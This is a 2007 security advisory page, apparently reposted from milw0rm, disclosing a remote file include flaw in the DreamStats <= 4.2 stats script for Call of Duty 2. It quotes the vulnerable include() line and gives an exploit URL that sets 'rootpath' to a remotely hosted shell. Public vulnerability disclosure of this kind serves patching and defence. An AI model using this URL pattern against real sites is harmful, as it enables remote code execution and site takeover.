Computer Security

Security Advisory: CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Flipper Poll v1.1.0 (poll.php) remote file include vuln

  EQdkp <= 1.3.1 Referer Spoof to access to SQL Database

  Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

  dB Masters' Curium CMS <= 1.03(c_id) Remote Blind SQL Injection Vulnerability

From:ThE dE@Th <mostafa_ragab_(at)_msn.com>
Date:03.02.2007
Subject:CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability

ConTact Me:-wWw.Asb-May.Net
ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************

ExPlOiT:-http://www.Site.com/PaTh/index.php?rootpath=[Shell]
********************************************************************************


# milw0rm.com [2007-02-02]
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server